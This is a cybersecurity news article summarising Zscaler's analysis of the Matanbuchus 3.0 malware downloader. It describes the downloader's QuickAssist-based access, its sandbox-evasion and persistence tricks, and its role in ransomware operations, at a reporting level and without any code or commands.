Matanbuchus 3.0 Downloader Pivots to Ransomware, Using Protobufs and QuickAssist for Stealth Access

A sophisticated C++ downloader known as Matanbuchus has resurfaced with a major technical overhaul, signaling a dangerous new phase in its lifecycle. Zscaler ThreatLabz identified “version 3.0 of Matanbuchus” in the wild as of July 2025, revealing that the malware has moved beyond its origins as a simple downloader to become a critical gateway for ransomware operators.

First observed in 2020, Matanbuchus operates as a “Malware-as-a-Service (MaaS),” renting its infrastructure to various cybercriminals. However, this latest iteration marks a strategic pivot. While it retains its core ability to “deploy additional payloads and perform hands-on keyboard activity via shell commands,” researchers warn that “despite its simplicity, Matanbuchus has been more recently associated with ransomware operations”.

ThreatLabz confirmed this escalation, stating they have “observed Matanbuchus deployments consistent with hands-on-keyboard ransomware operations.”

The new campaign relies on direct human interaction to bypass security perimeters. In one analyzed case, the threat actor utilized QuickAssist—a legitimate Microsoft remote support tool—likely “in conjunction with social engineering” to gain initial access to a victim’s machine.

Once connected, the attacker manually “used the command-line to download and execute a malicious Microsoft Installer (MSI) package from gpa-cro[.]com.”

This installer drops an executable named HRUpdate.exe, which uses a technique called DLL sideloading to launch the Matanbuchus downloader module.

The developers behind Matanbuchus v3.0 have significantly modernized its architecture to evade analysis. A key technical upgrade is the adoption of Protocol Buffers (Protobufs), a data format used “for serializing network communication data”.

To frustrate security researchers and automated sandboxes, the malware employs aggressive obfuscation:

• Junk Code: “Matanbuchus embeds multiple blocks of junk instructions in its codebase to hinder analysis.”
• Time-Wasting Loops: The downloader executes “long-running loops” or “busy loops” that “delay the downloader’s functionality for several minutes after initial execution, allowing it to evade behavioral analysis by sandboxes” which typically time out before the malware activates.
• Encryption: It uses the ChaCha20 stream cipher to decrypt strings and network payloads.

Once inside, Matanbuchus ensures it stays. It downloads shellcode that creates a scheduled task named “Update Tracker Task,” allowing the malware to survive system reboots.

The malware acts as a mothership for other threats. Zscaler observed campaigns where Matanbuchus distributed “the Rhadamanthys information stealer and the NetSupport RAT,” further compromising the victim’s network and data.

Matanbuchus 3.0 represents a mature, versatile threat that has successfully adapted to modern defenses. By combining social engineering tools like QuickAssist with advanced obfuscation techniques, it provides a stable foothold for ransomware gangs to launch devastating attacks.

Related Posts:

• Python Protobuf Flaw Allows DoS Via Nested Messages
• Zscaler found 150 Android apps infected with Windows malware
• Zscaler Report: 300% increase in phishing attacks delivered over SSL
• Widespread Outage: CrowdStrike Update Affects 8.5 Million Windows Users